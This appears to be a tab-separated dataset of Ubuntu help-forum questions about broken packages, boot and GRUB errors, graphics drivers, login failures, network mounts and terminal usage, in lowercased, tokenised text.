431806	problem with dependencies after uninstall dpkg-dev	i installed manually some drivers and since then i ca n't install nothing more . so i tried to reinstall dpkg with this : sudo dpkg -- purge -- force-d but now i cant do anything ... please , does anyone can help me with this ? this is what i get when trying to install anything : bcmwl-kernel-source : depends : libc6-dev but it is not installed build-essential : depends : libc-dev but it is a virtual package depends : gcc ( > = 4:4.4.3 ) but 4:4.7.2-1ubuntu2 is installed depends : g++ ( > = 4:4.4.3 ) but 4:4.7.2-1ubuntu2 is installed depends : dpkg-dev ( > = 1.13.5 ) but it is not installed comerr-dev : depends : libc-dev but it is a virtual package debhelper : depends : dpkg-dev ( > = 1.16.0 ) but it is not installed g++ : depends : cpp ( > = 4:4.7.2-1ubuntu2 ) but 4:4.6.3-1ubuntu5 is installed depends : gcc ( > = 4:4.7.2-1ubuntu2 ) but 4:4.7.2-1ubuntu2 is installed depends : gcc-4.7 ( > = 4.7.2-1~ ) but it is not installed g++-4.7 : depends : gcc-4.7-base ( = 4.7.2-2ubuntu1 ) but it is not installed depends : gcc-4.7 ( = 4.7.2-2ubuntu1 ) but it is not installed depends : libstdc++6-4.7-dev ( = 4.7.2-2ubuntu1 ) but 4.7.2-2ubuntu1 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed gcc : depends : cpp ( > = 4:4.7.2-1ubuntu2 ) but 4:4.6.3-1ubuntu5 is installed depends : gcc-4.7 ( > = 4.7.2-1~ ) but it is not installed libcurl4-openssl-dev : depends : libcurl3 ( = 7.22.0-3ubuntu4.7 ) but 7.22.0-3ubuntu4.7 is installed depends : libc-dev but it is a virtual package libgcrypt11-dev : depends : libgcrypt11 ( = 1.5.0-3ubuntu0.2 ) but 1.5.0-3ubuntu0.2 is installed depends : libc-dev but it is a virtual package libgnutls-dev : depends : libgnutls26 ( = 2.12.14-5ubuntu3.5 ) but 2.12.14-5ubuntu3.5 is installed depends : libgnutlsxx27 ( = 2.12.14-5ubuntu3.5 ) but 2.12.14-5ubuntu3.5 is installed depends : libgnutls-openssl27 ( = 2.12.14-5ubuntu3.5 ) but 2.12.14-5ubuntu3.5 is installed depends : libc-dev but it is a virtual package libstdc++6 : depends : gcc-4.7-base ( = 4.7.2-2ubuntu1 ) but it is not installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed libstdc++6-4.6-dev : depends : gcc-4.6-base ( = 4.6.3-1ubuntu5 ) but 4.6.3-1ubuntu5 is installed depends : g++-4.6 ( = 4.6.3-1ubuntu5 ) but 4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6.3-1ubuntu5 ) but 4.7.2-2ubuntu1 is installed depends : libc6-dev ( > = 2.13-0ubuntu6 ) but it is not installed libstdc++6-4.7-dev : depends : gcc-4.7-base ( = 4.7.2-2ubuntu1 ) but it is not installed depends : g++-4.7 ( = 4.7.2-2ubuntu1 ) but 4.7.2-2ubuntu1 is installed depends : libstdc++6 ( > = 4.7.2-2ubuntu1 ) but 4.7.2-2ubuntu1 is installed depends : libc6-dev ( > = 2.13-0ubuntu6 ) but it is not installed libstdc++6 : i386 : depends : gcc-4.6-base ( = 4.6.3-1ubuntu5 ) but 4.6.3-1ubuntu5 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed nvidia-304 : depends : x11-common ( > = 1:7.0.0 ) but 1:7.6+12ubuntu2 is installed depends : libc6-dev but it is not installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed depends : xorg-video-abi-14 but it is a virtual package ruby1.8-dev : depends : libruby1.8 ( = 1.8.7.352-2ubuntu1.4 ) but 1.8.7.352-2ubuntu1.4 is installed depends : libc6-dev but it is not installed ruby1.9.1-dev : depends : libruby1.9.1 ( = 1.9.3.0-1ubuntu2.8 ) but 1.9.3.0-1ubuntu2.8 is installed depends : libc6-dev but it is not installed zlib1g-dev : depends : zlib1g ( = 1:1.2.3.4.dfsg-3ubuntu4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed depends : libc-dev but it is a virtual package
431807	`` error : can not read `/dev/sda ' : input/output error . '' repeatedly during upgrade	i 'm currently running a distribution upgrade and my terminal output looks like this : ... generating grub.cfg ... error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . ... ( many times ) found linux image : /boot/vmlinuz-3.11.0-18-generic found initrd image : /boot/initrd.img-3.11.0-18-generic error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . error : can not read `/dev/sda ' : input/output error . ... ( and so on ) i 've had this problem before while running upgrades and installing things and it always eventually works but i just consistently get this message over and over again and it seems to really slow the whole process down . i was just wondering : what could be causing this ? is it something i should worry about ? and is there anything i can do about it ? thanks in advance for any help .
431809	help me with this ... . i 'm just finished install ubuntu and got these error	i ca n't install ubuntu from bootable usb . it shows the message that it has successfully finished installation but every time i restart my laptop i get an error message that no bootable device is present . i also ca n't get permission to view any of my hard drives via live usb , ca n't install apps via cli or ubuntu softwarecenter . i decided to try to reinstall the os and i found that i ca n't even install ubuntu again . clicking on 'install ubuntu 13.10 ' is n't doing anything . please help me . how can i again install ubuntu via usb ? this is my only laptop . that is all i have . please help me .
431812	pidgin ocs certificate	running ubuntu 13.10 , pidgin 2.10.7 , with the sip plugin pidgin-sipe 1.16.1-1 . i connect to my work intranet using a vpn . i want to use pidgin for im with coworkers who are on site and using microsoft office communicator . when i set up pidgin for office communicator protocol , the first time it asks me to accept a certificate from my employer . but , this is the message that it says to me : '' accept certificate for xxxx.xxx.xxx ? the certificate for xxxx.xxx.xxx could not be validated . the certificate is not trusted because no certificate that can verify it is currently trusted . '' there are three buttons : `` view certificate ... '' , `` reject '' , and `` accept '' . my guess is that , based on the message saying that the certificate could not be validated , that `` something '' is wrong - but i do n't know what . what is this message telling me ? ( i tried just accepting the certificate despite the ominous message . but , when i then try to enable my account using my credentials , i keep getting this error message from pidgin : `` failed to authenticate to server '' . )
431814	how to upgrade from ubuntu amd 64bit to intel 64bit ?	i 've been using ubuntu 12.10 for about a year and half now on my laptop with an intel processor . when i installed it i was dumb enough to commit the mistake of downloading a amd 64bit version of the os instead of an intel 64bit version . it actually works ok sometimes , but i think that i might be forcing my processor since it 's using the wrong drivers , and ubuntu sometimes randomly freezes when i have just few programs open and i end up having to force restart it . my question is , is it possible to upgrade to a intel 64bit version of ubuntu , without loosing most of the programs i have installed and personal files ? thanks in advance .
431817	calc always have to zoom in !	every time when i open new document in libre office calc , the cells are too small so every time i have to zoom in with ctrl+scroll wheel up ; ( see the picture below ) how can i set the most acceptable view for me ( but not only for one document , i want larger cells every time i open new blank document ) ?
431825	deja-dup can not access truecrypt volume when run from cron	i have a deja-dup set up to backup into a mounted truecrypt volume . it works fine but now i would like to run deja-dup in my own intervals via cron ( set up for my account ) : * * * * * env display=:0 deja-dup -- backup ( the every-minute schedule is just for testing ) the job is started fine but deja-dup outputs that the destination is not available : if i try to set up the cron job through the `` scheduled tasks '' gui and select it to be `` x application '' , it 's added to the cron jobs as : * * * * * /usr/bin/python /usr/share/gnome-schedule/xwrapper.py c 2 # job_id_2 however , when the job is run , it fails in the same way as with my own cron setting . as the task starts just fine if i run it from terminal , my assumption is that for some reason the task started via cron does n't have permission to access the mounted volume . q1 : as the task is started from my user 's cron settings and should therefore run as my user , why would n't it have access to a mounted volume ? q2 : could the reason of failure be something else than permissions ? q3 : can you suggest some solution for this problem ?
431829	how to select an already-made partition to install ubuntu	i have windows 8 on my pc right now and i would like to install ubuntu . on my hdd i have following partitions ( i see the names form a partition software i use which is called `` minitool partition wizard '' ) : 1 ) * : system ( fat32 ) 2 ) * : ( other ) 3 ) c : os ( ntfs ) 4 ) d : ( ntfs ) 5 ) g : ( ntfs ) < - this is the one i created for ubuntu 6 ) * : recovery all i want to do is to install ubuntu on g : partition . the problem comes when i am in the ubuntu installation page abd i select the option to manually partition the hard drive . names shown in that window are not the same as the ones shown on windows , and i cant recognize and install . and i obviously want to have a dual-boot with ubuntu and w8 . can someone help me ? thanks a lot in advance .
431833	how to change icon image on ubuntu 12.04 ?	i want to change icon of a binary file which is placed on my desktop binary file is related to unetbootin . i want to execute unetbootin from desktop so i want to change icon . can anyone help me in this regard . farooq
431836	inbuilt webcam not detected lenovo ideapad s 10 3c	i have installed ubuntu 13.10 ( fully updated ) on my ideapad s10 3c.everything seems to work well except for the webcam which is not detected by the system ( tried lsusb ) .archlinux ( https : //wiki.archlinux.org/index.php/lenovo_ideapad_s10-3 ) says that webcam works out of the box.but unfortunately this is not the case with my netbook.tried everything available on net.however external webcam when attached works fine.inbuilt webcam was functional in windows 7 so no hardware issues.please suggest a fix or if anyone got it to work in earlier versions of ubuntu . output of lspci : 00:00.0 host bridge : intel corporation atom processor d4xx/d5xx/n4xx/n5xx dmi bridge 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:02.1 display controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation nm10/ich7 family sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 02:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie output of lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub all webcam related applications give this error : /dev/vid0 device not found
431838	`` call to lnusertemp failed ( temporary directories full ? ) . check your installation	i installed kde only to experiment , and it destroyed my user . i receive an error that do n't let me start x , after typing the password shows : '' could not update iceautohirty file /home/user/iceauthority already tried google 's few results : vi /etc/rc.d/perms chmod -r 1777 /temp chmod +x /etc/rc.d/perms cd home sudo chown -r user : user /home/user/iceauthority sudo chmod 644 /home/user/.iceauthority sudo mkdir /var/temp sudo chmod 777 /var/tmp sudo chmod o+t /var/tmp rm .iceauthority ( did n't work ) sudo apt-get install gnome-session ( nothing changed ) sudo apt-get -reinstall gnome-session ( did n't work ) ls -l /home sudo chown user : user /home/x/ rm -rf ~/.iceauthority after trying startx once more , just by opening the console it showed : > fopen : permission denied > no directory , logging it with home by startx : > fatal server error > server is already active for display 0 > if this server is no longer running remove /tmp/.x0-lock and start again > delxsiggiveup : closing log > x connection to : 0 broken ( explicit kill or server shutdown ) so i commanded : rm -rf /tmp/x0-lock and nothing showed up . so i tried only : rm /tmp/x0-lock and showed that : > diretory does n't exist so i tried startx another time : > fatal server error > server is already active for display 0 > if this server is no longer running remove /tmp/.x0-lock and start again > delxsiggiveup : closing log > x10 : fatal io error 11 ( resource temporarly unavaible ) on xserver > '0 ' after 7 requests ( 7 known processed ) with 0 events remaining sudo adduser newuser logging with kde-plasma , shows : '' call to lnusertemp failed ( temporary directories full ? ) . check your installation . still do n't boot .
431841	is there a lens for google search on ubuntu 12.04 lts ?	i have ubuntu 12.04 lts and i was wondering that if there is a google search lens for ubuntu ? thanks guys : )
431844	grub efi bootup order	i have two versions of linux installed in different partitions on a 2013 imac and i 'm using refind to perform the initial booting , which then starts up the grub efi binary that lives on a dedicated msdos partition . if i select grub , it seems to scan all my partitions and discovers a kernel at /dev/sda8 ( latest release ) and /dev/sda9 ( long term support ) . it then gives me the option to boot into each kernel , but orders them in alphabetical order : meaning the old kernel is the default . but i want the new kernel to be the default . there do not appear to be any config files for this /boot/efi/efi/ version of grub ... the /boot/grub/* files are specific to each installation . how can i set the display order ( or at least the default choice ) for grub efi ?
431848	how to create a mountable backup with partclone ( after using clonezilla ) , i can normally restore from with clonezilla ?	so , i want to mount a clonezilla image file . for this to happen , i would use partclone and instead of ca 500 small files i will get one big file , which i could mount . can i afterwards delete the original backup files ( or will they be automatically deleted ) . and use the big backupfile , again in clonezilla live to restore everything to how it was ? so i could have a mountable backup file i could use to push my old files over onto a new distribution , and if something fails , i could just restore my ubuntu 13.10 with it normally under clonezilla .
431849	how to root my acer tablet	i 'd like to know if there a chance to root my acer tablet to install ubuntu on it . there is method under windows but this did not work on my tablet . i 've still seached the internet but ca n't find a solution . can some one help me ?
431851	13.10 : ca n't log in	so i 've tried just about every fix i could find out there , but i still ca n't log in to my account . when i enter the correct password , the screen goes black for about a second , the cursor disappears , and after another second it brings me right back to the login screen . i can log in to the guest account without any issues , but not the one i normally use . for reference , i 've tried all these possible solutions : sudo mv ~/.xauthority ~/.xauthority.backup nothing happens . exact same issue . sudo apt-get remove -- purge cinnamon* sudo apt-get autoremove tells me cinnamon is not installed . issue continues . ls -lah chown `` username : username '' .xauthority '' username '' = my username . no errors , but the issue persists . ls -ld /tmp sudo chmod a+wt /tmp still no errors , but no sign of being able to log in . sudo dpkg-reconfigure lightdm works in the background for about a second and ... . nothing . issue persists . sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current update of nvidia drivers proceeds with no errors , but it does nothing to correct my issue . sudo service lightdm restart kicks me back to the login screen but the issue persists . sudo rm ~/.xauthority sudo rm ~/.xauthority nothing happens . reinstall ubuntu ( twice . ) nothing changed either time . edit : contents of /var/log/xorg.0.log available at http : //paste.ubuntu.com/7063767/ anyone have some ideas ?
431854	laptop display black	noob here ... searching for a while for the answer to this but have n't had any luck . i am out of town and just fired up my laptop but got a black screen only . totally my fault because i usually have a monitor plugged in and ( with the help of an few websites ) wrote a script to keep my laptop display off , but i forgot to disable it before travelling now i am kinda screwed . i managed to get a terminal up and tried playing with xrandr but it just keeps telling me 'ca n't open display ' whenever i try something . i do n't remember what the content of the script was but xrandr sounds farmiliar . so i am a little frustrated and could use some help . i have an acer aspire 5315 running lubuntu ( most recent stable , 13.04 i think ? ) nothing fancy or crazy ... jus need to get it working so i can get some work done . any help would be greatly appreciated !
431855	ubuntu 13.10 amd apu a10 graphics issues	for a while i 've been trying to install ubuntu 13.10 on my laptop with amd a10 apu in dual boot with windows 7 ( using bios ) . the problems i face : directly installing ubuntu 13.10 gives the problem - > running in low graphics mode which i could solve by using : sudo apt-get install fglrx-updates which makes it able to install it . the problem once ubuntu 13.10 is installed is as soon as i run any type of video , my complete system freezes and i am unable to do anything , wierdly enough the sound continues . what i have tried : installing ubuntu 13.04 first and then upgrading to 13.10 - > works but after installing vlc and ubuntu codecs etc ubuntu is unable to play any sort of video without the system crashing installing mint 16 by updating linux mint 15 to 16 ( because directly installing 16 is impossible , because of the graphics ) . all with no luck . i 've seen several topics about updating the amd drivers but it does not work . mostly gives the result of a black screen after login . does anyone know a solution to my problem ?
431856	unity crashes when running ubuntu in a vm	i ca n't get ubuntu ( tried both 12.10 and 13.10 ) to play nice with my vm . everything looks fine when i log in , but trying to use the dashboard will cause a crash . the crash can be triggered by just about anything but the surest way to reproduce is to attempt to search for anything using the dashboard ( top left unity button ) . when this happens , i am presented with a blank desktop : what i 've tried : i did this once while watching ~/.xsession-errors with tail -f and nothing new appeared when the crash occurred . deleting ~/.xsession-errors , rebooting and triggering the crash again , does not recreate the file . i have installed guest additions on the guest os details : host os : lmde , basically debian testing guest os : ubuntu 13.10 64bit virtual machine : 4.3.8 r92456 vm settings : note : do n't let the name fool you , i am actually running 13.10 , the vm name is just left over from a previous install .
431859	terminator requires java 6 or newer ?	i installed terminator ( org.jessies.terminator.i386.deb ) on ubuntu 12.04 but after executing it i got this error . `` terminator requires java 6 or newer . http : //java.sun.com/javase/downloads/ may link to a suitable jre , if you ca n't use one provided by your os vendor '' can anyone help me on this ? farooq
431860	launch steam games without a x desktop running	i 'm using the first , accepted answer to this question to have steam as an environment on login . steam itself works fine , but when i attempt to start a game , the screen turns black and i have to restart lightdm service to be able to login again ... how do i launch a game when there 's no desktop environment running , just lightdm and steam in bigpicture mode ? i 've tried to start dota2 and super hexagon , but both times the screen turns black .
431863	terminal , how to quit -- more -- list	i use autocomplete a lot in the terminal , like for example for cp command . but sometimes , when i am putting in the directory for the cp command and i press tab , the list of files is so long that ubuntu spits out part of the list and then waits for key input before sequentially listing the rest of the files , one by one . this feature is near useless because you never know how many files are left , and almost always end up with an error . is there some way to leave this list and go back to my cp command , or do i have to press ctrl+c and start typing in my cp command again ?
431871	upgrade from 13.04 to 13.10 , update-manager crashed , and now hangs	i started update-manager in order to do the 13.04 to 13.10 upgrade . at some point not far into the process , it died with some sort of unexplained error . ( there was a message in the console about a unicode decode failure , but i do n't know whether to pay attention to that ; linux gui programs spew out continual errors and warnings under apparently normal operation . ) when i start it back up now , it just sits there burning cpu , showing the initial `` checking for updates '' progress screen . the `` stop '' button is greyed-out . i think that before the thing died the first time , it had gotten part-way , or maybe all the way , through the process of updating my apt files to point to the new release . at this point , should i just kill the update-manager process and do a manual apt-get dist-upgrade from the command line ? is there something i should check first to make sure that wo n't be a disaster ?
431873	terminal with output scrolling down	i have currently decided to test my double monitors in the vertical configuration , and i came across a problem that i had never had before : the input line on my terminal is too far down the screen ! i was wondering if there is a way to make the output scroll downwards , so that the input line stays at the top . e.g. , a normal terminal view looks like this : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=46 time=28.3 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=46 time=13.7 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=46 time=19.1 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=45 time=20.8 ms 64 bytes from 8.8.8.8 : icmp_req=5 ttl=45 time=15.6 ms 64 bytes from 8.8.8.8 : icmp_req=6 ttl=46 time=15.3 ms 64 bytes from 8.8.8.8 : icmp_req=7 ttl=46 time=15.3 ms 64 bytes from 8.8.8.8 : icmp_req=8 ttl=45 time=14.3 ms 64 bytes from 8.8.8.8 : icmp_req=9 ttl=45 time=14.3 ms 64 bytes from 8.8.8.8 : icmp_req=10 ttl=45 time=15.5 ms 64 bytes from 8.8.8.8 : icmp_req=11 ttl=45 time=16.9 ms 64 bytes from 8.8.8.8 : icmp_req=12 ttl=45 time=16.3 ms 64 bytes from 8.8.8.8 : icmp_req=13 ttl=45 time=20.0 ms ^c -- - 8.8.8.8 ping statistics -- - 13 packets transmitted , 13 received , 0 % packet loss , time 12017ms rtt min/avg/max/mdev = 13.773/17.391/28.343/3.812 ms me @ my_computer : ~ $ and instead i would like to have something like this : me @ my_computer : ~ $ rtt min/avg/max/mdev = 13.773/17.391/28.343/3.812 ms 13 packets transmitted , 13 received , 0 % packet loss , time 12017ms -- - 8.8.8.8 ping statistics -- - ^c 64 bytes from 8.8.8.8 : icmp_req=13 ttl=45 time=20.0 ms 64 bytes from 8.8.8.8 : icmp_req=12 ttl=45 time=16.3 ms 64 bytes from 8.8.8.8 : icmp_req=11 ttl=45 time=16.9 ms 64 bytes from 8.8.8.8 : icmp_req=10 ttl=45 time=15.5 ms 64 bytes from 8.8.8.8 : icmp_req=9 ttl=45 time=14.3 ms 64 bytes from 8.8.8.8 : icmp_req=8 ttl=45 time=14.3 ms 64 bytes from 8.8.8.8 : icmp_req=7 ttl=46 time=15.3 ms 64 bytes from 8.8.8.8 : icmp_req=6 ttl=46 time=15.3 ms 64 bytes from 8.8.8.8 : icmp_req=5 ttl=45 time=15.6 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=45 time=20.8 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=46 time=19.1 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=46 time=13.7 ms 64 bytes from 8.8.8.8 : icmp_req=1 ttl=46 time=28.3 ms ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . i could not find any such documentation or question on the forums . if anyone has an idea , please let me know ! ( also if you think it 's not possible ) thanks ! ps : i 'm using ubuntu 12.04
431877	nvidia drivers and ubuntu 12.04 x64	i had linux mint installed on my desktop . i was using xserver to configure the cards and i could not for the life of me get my monitors to display properly . here is some information on my setup : i have a bfgtech gts250 pushing to two 25 '' monitors . i have another card geforce gt 520 pushing to a 60 '' tv . out of the box ubuntu is doing quite well with both cards . every now and then the mouse will freeze and the computer become unresponsive . it will suddenly catch up with all my mouse movement and i am ready to rock . i have attempted the following : sudo apt-get -- purge remove nvidia-current reboot . sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current nvidia-settings reboot . now , my large tv is displaying a blank screen and the mouse is a large `` x '' . any advice ? thanks in advance for any help . after removing the nvidia install and installing from nvidia-331 i get the same results . here is my xorg.conf : http : //pastebin.com/93jtx5ge
431878	how can i make thunar save smb-bookmarks ?	thunar saves local bookmarks well , but it `` forgets '' bookmarks directing to smb shares . if i add them in thunar , they are saved in ~/.gtk-bookmarks and remain there while i am logged in . once i log out and log in again and start thunar , only the bookmarks starting with `` file : /// '' are read in and displayed in thunar , those that begin with `` smb : // '' are skipped . i wonder how i could tell thunar to also read in smb bookmarks instead of ignoring them ?
431879	error when installing ubuntu-zfs	i 'm switching from freenas to ubuntu 12.04 lts . after a vanilla install of ubuntu has been completed i run the following commands in the order shown to install zfs : apt-get install python-software-properties add-apt-repository ppa : zfs-native/stable apt-get -y -q update & & apt-get -y -q upgrade apt-get install ubuntu-zfs when the last command is run zfs is installed and seems to be working correctly ... mostly ( more on that later ) . however , when the last command is run i get this error ( full log here ) : configure : error : *** please make sure the kmod spl devel < kernel > package for your *** distribution is installed then try again . if that fails you *** can specify the location of the spl objects with the *** ' -- with-spl-obj=path ' option . what is this error and how do i fix it ? now i said mostly earlier because my pool 's do n't auto mount when the server restarts the way they should . all my reading ( mostly from this page ) indicates that mountall should just take care of the mounting . i have followed the instructions on that page and i can not get mountall to work correctly . my pools will only auto mount on restart if i edit /etc/fstab or change the zfs_mount and zfs_unmount options in /etc/default/zfs .
431881	grub does not load , only shows a blinking cursor	first , sorry , i may mix things up here because i do n't know extensively about a computer 's architecture . so i bought an asus eee pc 1025e and wanted to replace windows 7 starter by a gnu/linux distribution , so i chose debian . however i wanted something else so i put ubuntu 13.10 on an usb stick and started the installation from the stick . here 's where i did something really dumb . while navigating through the installation menus i noticed the computer was getting slow ( it did n't surprise me because c'mon , it 's a tiny computer ) , so i shut down the computer . what i did n't notice was that although it did n't seem like it , ubuntu was actually being installed while i was in the menus ( the program did n't tell me it ) . since i ordered ubuntu to write itself over all of my hdd , i ended with a messed up hard drive because i interrupted the installation process . symptoms : when i boot up the computer , the asus screen shows for a second , then a blinking cursor appears which i assume is from grub . from here it seems i ca n't do anything except press ctrl+alt+del which restarts my computer and does the same process . here 's the tricky part : due to my computer being a netbook it does n't have anything to read disks , so any solution involving a disk does n't work . any advice would be greatly appreciated because i basically put my computer out of service at that point . julien
431883	got this error when trying to install avast	help a newbie ! tryed to download avast and this message shows up ? some one who care to explain slowly and in a kind way , what the message means , and if i can fix it myself ? archive : /home/lars/hentede filer/avast_internet_security_setup_online.exe [ /home/lars/hentede filer/avast_internet_security_setup_online.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/lars/hentede filer/avast_internet_security_setup_online.exe or /home/lars/hentede filer/avast_internet_security_setup_online.exe.zip , and can not find /home/lars/hentede filer/avast_internet_security_setup_online.exe.zip , period .
431884	i 'm unable to change/set read write permission on mounted remote drives and directories	ubuntu 12.04 lts i 've been working on a read write permission issue involving a network drive mounted locally on my ubuntu box . i use this device to run my plex server , i keep my media files on a separate synology server . i have the synolgy 's shared folders mounted locally on my ubuntu box via cifs . //valhalla/video /home/uid/synology/video cifs rw , _netdev , uid=uid , user=uid , password=pw 0 0 //valhalla/music /home/uid/synology/music cifs rw , _netdev , uid=uid , user=uid , password=pw 0 0 //valhalla/photo /home/uid/synology/pictures cifs rw , _netdev , uid=uid , user=uid , password=pw 0 0 i can fully access read/write these files & directories with my windows machine and through the synology 's web interface and device apps . my ubuntu box can read/write some directories & files ; others it can only read but ca n't write/delete , and others i can only see them listed but ca n't read or write to them . i use the same user id & pw to access the files/directories/folders from all devices and apps . the ubuntu box is the only one i 'm having this issue with . i 've tried different suggestion found on various forums , but none have worked . i 've tried to set ownership/group/user permissions on these directories & sub-directories through ubuntu but they have n't taken or worked . there must be a simple solution to this . i 'm still new to linux/ubuntu . thank you for your assistance .
431885	integrity check after an update fail in xubuntu	i have done an update ( 61mb ~ total ) in xubuntu 12.04 this morning but the progress bar was blocked at the start so i decided to cancel the update 's installation . during the second update check the update manager that there were only 10mb ~ of updates and an error that said to run the following command : sudo apt-get install -f. this command showed another error that said to run this command : sudo dpkg -- configure -a . after this command and a system reboot i think i have installed all the update but im not sure of the integrity of the system . is there any method to see if all in my os is fine ?
431890	screen cuts up while playing mediviel total war 2	when playing mediviel war 2 total war my sceen gets cut up into 4 to 5 pieces and shows the content cut up.i do not have a good graphics card but the game does not need good graphics either . i have intel sandybridge grapics i3 processor 2nd gen 3.4 ghz clockspeed 2gb ram 500 gb hardisk
431892	arch linux like way to remove package and dependencies ?	i have within the last year started to experiment with linux in an effort to learn the technical underpinnings as well as the fact that i strongly support the whole idea of open source software . anyways , two of the distributions that i have spent the most time messing around with are arch linux and ubuntu . i realize they are extremely different but my question today has to do with the package management system . in arch linux if you would like to remove a package and all of its dependencies you can run a command pacman -rs [ packagename ] . to see packages installed as dependencies and no longer needed by any other program you can run pacman -qdt . now in ubuntu or for that matter any other apt based package system you remove packages with something like apt-get remove [ packagename ] followed by apt-get autoremove to take away dependencies that are no longer needed . the problem that i seem to be having is that while in arch linux running something like pacman -rs gnome will remove gnome and all of the dependencies installed with it and an pacman -qdt will allow me to make sure nothing is left over , but in ubuntu apt-get remove gnome will only remove the meta package , and then running apt-get autoremove returns nothing . i was wondering how i could achieve a pacman -rs type removal on an apt based package system .
431895	how do i get remote desktop or other services running on ubuntu 12.04	i have just installed ubuntu 12.04 on a computer and would like to have it act as a server for remote desktop sessions and other services on my network . how can i accomplish this . i am also new to using ubuntu . formerly all windows user .
431901	software updater not automatically launching any more	i run ubuntu 12.10 32-bit and ( if this is relevant ) use the cinnamon desktop . when i first installed ubuntu about a year and a half ago , the software updater would pop up automatically whenever updates are available and prompt me to confirm that i wanted to install the updates . now , however , it never pops up and i have to launch the updater manually to check for and install updates . i have not changed any settings for the updater and , in fact , it appears to be set to automatically notify when updates are available . any insights on why it 's not doing so and how i may be able to configure it to do so , as it did when i first installed ubunto ? thanks !
431905	how does update work with programs installed from .deb file	i 'm having some difficulties exactly understanding how the the whole update thing work in linux ( ubuntu ) and good practice for installing software . i understand i have a /etc/apt/sources.list file where all my repositories are listed , and that these repositories are queried when i use apt-get update -- to later be used with eg . apt-get upgrade . this makes perfect sense and i recently installed spotify by adding deb http : //repository.spotify.com stable non-free to this `` sources '' list . but then i got confused ... when i went to download google chrome i merely had to download and grab a .deb file , and chrome is installed with no problem ... but ... i do n't see any new entry in /etc/apt/sources.list ... so how does apt-get update know where to query concerning chrome updates ? has it somehow been added to one of the already listed repositories in the sources file ? i would like all my installed software to be encompassed by the update function . thanks a bunch for any help ! : )
431911	how can i verify the speed of my nic in ubuntu ?	is there a command that i can verify by its output the speed of my nic and some information about its characteristics such as duplex full or half .
431913	13.10 and cinnamon desktop	apologies if this has already been answered , but it appears that the suggested duplicates do n't quite hit this issue . i am currently running 12.10 with the cinnamon desktop with which i am very comfortable . i am possibly interested in upgrading to 13.10 but am wondering whether the cinnamon desktop , as i have configured it , will remain as is after install ? or would i have to reinstall the version of cinnamon that is meant to run over the ubuntu repositories ? i would prefer not to have to reinstall it , since i found the initial process of doing so with 12.10 a bit tricky -- and i 'm not even sure how i finally got it to work !
